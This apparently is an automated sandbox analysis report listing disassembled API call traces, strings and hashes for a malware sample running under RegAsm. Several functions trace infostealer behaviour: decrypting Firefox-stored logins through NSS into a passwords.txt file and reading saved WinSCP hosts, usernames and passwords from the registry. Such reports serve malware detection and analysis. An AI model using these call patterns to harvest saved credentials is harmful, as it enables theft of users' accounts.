                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • NSS_Init.NSS3(00000000,00000000,00000000,00000009,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040938E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409473
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040947C
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040948B
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00409495
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00420838,00000000,?,?,?,?,?,?,?,00000000,00420838,000000FF), ref: 004094A8
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094B5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094BC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01571F20,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094CD
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000010,01572160,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094EB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F758), ref: 00409501
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409514
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C40), ref: 00409523
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409536
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C44), ref: 00409545
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F828), ref: 00409555
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,-00000010), ref: 00409560
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C48), ref: 0040956F
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE,01571B80,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409580
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014,01571B20,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409591
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F7E8), ref: 004095A7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: memset.MSVCRT ref: 00409259
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: lstrlen.KERNEL32(004095B3,00000001,?,00001FA0,00000000,00000000,?,004095B3), ref: 00409276
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: CryptStringToBinaryA.CRYPT32(004095B3,00000000,?,004095B3), ref: 0040927E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_GetInternalKeySlot.NSS3(?,004095B3), ref: 0040928C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,004095B3), ref: 004092A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004092D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: memcpy.MSVCRT ref: 004092F1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_FreeSlot.NSS3 ref: 0040930B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004095BB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C4C), ref: 004095CA
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE,01571B20,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004095DB
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014,0156F728,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004095EC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,01571FE0), ref: 00409602
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: lstrcat.KERNEL32(00426A96,00426A9A), ref: 0040932D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420838), ref: 00409334
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409616
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C50), ref: 00409625
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C54), ref: 00409634
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000002,01571F20,?,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409645
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409659
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004096AB
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004096B4
                                                                                                                                                                                                                                                                                                  • NSS_Shutdown.NSS3(?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004096BA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileK11_lstrcpy$Slotlstrlen$FreeHeapPointermemset$AllocAuthenticateBinaryCloseCryptDecryptHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 888326940-347816968
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8d9d6e7c8489ba495897a24762163eeeb39d4a4ecc1c895c6ee1349d63147b4
                                                                                                                                                                                                                                                                                                  • Instruction ID: dfcf3cf3b5ff1e9ebf6a3d7c4469863c68c85a99f92adb76784daa1832cd8296
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8d9d6e7c8489ba495897a24762163eeeb39d4a4ecc1c895c6ee1349d63147b4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB1D375900219ABD714EBE0DD49FAE7B7AEF19304F10052DFA11A32D1CB786905CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040C5DC
• lstrcat.KERNEL32(?,Host: ), ref: 0040C5EB
• RegGetValueA.ADVAPI32("@,?,HostName,00000002,00000000,00000000,?), ref: 0040C60F
• lstrcat.KERNEL32(?,00000000), ref: 0040C61C
• RegGetValueA.ADVAPI32("@,?,PortNumber,0000FFFF,00000000,00421170,?), ref: 0040C647
• lstrcat.KERNEL32(?,00000000), ref: 0040C66D
• lstrcat.KERNEL32(?,:22), ref: 0040C689
• lstrcat.KERNEL32(?,00426E38), ref: 0040C698
• lstrcat.KERNEL32(?,Login: ), ref: 0040C6A7
• RegGetValueA.ADVAPI32("@,?,UserName,00000002,00000000,?,?), ref: 0040C6CB
• lstrcat.KERNEL32(?,?), ref: 0040C6D8
• lstrcat.KERNEL32(?,00426E50), ref: 0040C6E7
• RegGetValueA.ADVAPI32("@,?,Password,00000002,00000000,?,?), ref: 0040C70B
• lstrcat.KERNEL32(?,Password: ), ref: 0040C716
• StrCmpCA.SHLWAPI(?,00426B2B), ref: 0040C728
• lstrcat.KERNEL32(?,00000000), ref: 0040C763
• lstrcat.KERNEL32(?,00426E6C), ref: 0040C77D
• lstrcat.KERNEL32(?,00426E70), ref: 0040C78C
• RegEnumKeyExA.ADVAPI32("@,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C7B1
  • Part of subcall function 00411B90: wsprintfA.USER32 ref: 00411BAB
• memset.MSVCRT ref: 0040C7C2
• memset.MSVCRT ref: 0040C7D0
• lstrlen.KERNEL32(?), ref: 0040C7E8
• memset.MSVCRT ref: 0040C838
Strings
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
• String ID: "@$Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
• API String ID: 2902345061-497330012
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C804730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8044B2,6C87E21C,6C87F7F8), ref: 6C80473E
  • Part of subcall function 6C804730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C80474A
• GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8044BA
• LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8044D2
• InitOnceExecuteOnce.KERNEL32(6C87F80C,6C7FF240,?,?), ref: 6C80451A
• GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80455C
• LoadLibraryW.KERNEL32(?), ref: 6C804592
• InitializeCriticalSection.KERNEL32(6C87F770), ref: 6C8045A2
• moz_xmalloc.MOZGLUE(00000008), ref: 6C8045AA
• moz_xmalloc.MOZGLUE(00000018), ref: 6C8045BB
• InitOnceExecuteOnce.KERNEL32(6C87F818,6C7FF240,?,?), ref: 6C804612
• ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C804636
• LoadLibraryW.KERNEL32(user32.dll), ref: 6C804644
• memset.VCRUNTIME140(?,00000000,00000114), ref: 6C80466D
• VerSetConditionMask.NTDLL ref: 6C80469F
• VerSetConditionMask.NTDLL ref: 6C8046AB
• VerSetConditionMask.NTDLL ref: 6C8046B2
• VerSetConditionMask.NTDLL ref: 6C8046B9
• VerSetConditionMask.NTDLL ref: 6C8046C0
• VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8046CD
• GetModuleHandleW.KERNEL32(00000000), ref: 6C8046F1
• GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8046FD
Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
• String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
• API String ID: 1702738223-3894940629
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
  • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
  • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
  • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
• GetCurrentThreadId.KERNEL32 ref: 6C83F70E
• ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C83F8F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: GetCurrentThreadId.KERNEL32 ref: 6C8063D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: AcquireSRWLockExclusive.KERNEL32 ref: 6C8063DF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C80640E
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F93A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F98A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F990
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F994
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C7FB5E0
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F739
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F746
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F793
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C87385B,00000002,?,?,?,?,?), ref: 6C83F829
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C83F84C
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C83F866
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83FA0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C805E8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805E9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThreadId.KERNEL32 ref: 6C805EAB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThreadId.KERNEL32 ref: 6C805EB8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805ECF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C805F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C805F47
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentProcess.KERNEL32 ref: 6C805F53
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThread.KERNEL32 ref: 6C805F5C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentProcess.KERNEL32 ref: 6C805F66
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C805F7E
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83F9C5
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83F9DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Thread , xrefs: 6C83F789
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C83F71F
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C83F9A6
                                                                                                                                                                                                                                                                                                  • " attempted to re-register as ", xrefs: 6C83F858
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                                                                                                  • API String ID: 882766088-1834255612
                                                                                                                                                                                                                                                                                                  • Opcode ID: b144f098bb565951e0a034a9e7a03d0c3c3863cf87281b7892043207b8e91dbd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e12617065fb0f5a66a7e60598ce2f29203104d8fc2601ebbde3b15afd92f17b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b144f098bb565951e0a034a9e7a03d0c3c3863cf87281b7892043207b8e91dbd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 808129716043249FD731DF68C644AAE77E5EF95308F405C6DE84997B11EB30A849CBE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EE60
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EE6D
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EE92
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C83EEA5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C83EEB4
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C83EEBB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EEC7
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83EECF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: GetCurrentThreadId.KERNEL32 ref: 6C83DE73
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C804A68), ref: 6C83DE7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C804A68), ref: 6C83DEB8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: free.MOZGLUE(00000000,?,6C804A68), ref: 6C83DEFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C83DF38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EF1E
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EF2B
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EF59
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EFB0
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EFBD
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EFE1
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EFF8
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F000
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C83F02F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C83F09B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C83F0AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C83F0BE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause, xrefs: 6C83F008
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_stop, xrefs: 6C83EED7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                                                                  • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023D5
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023F5
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023EB
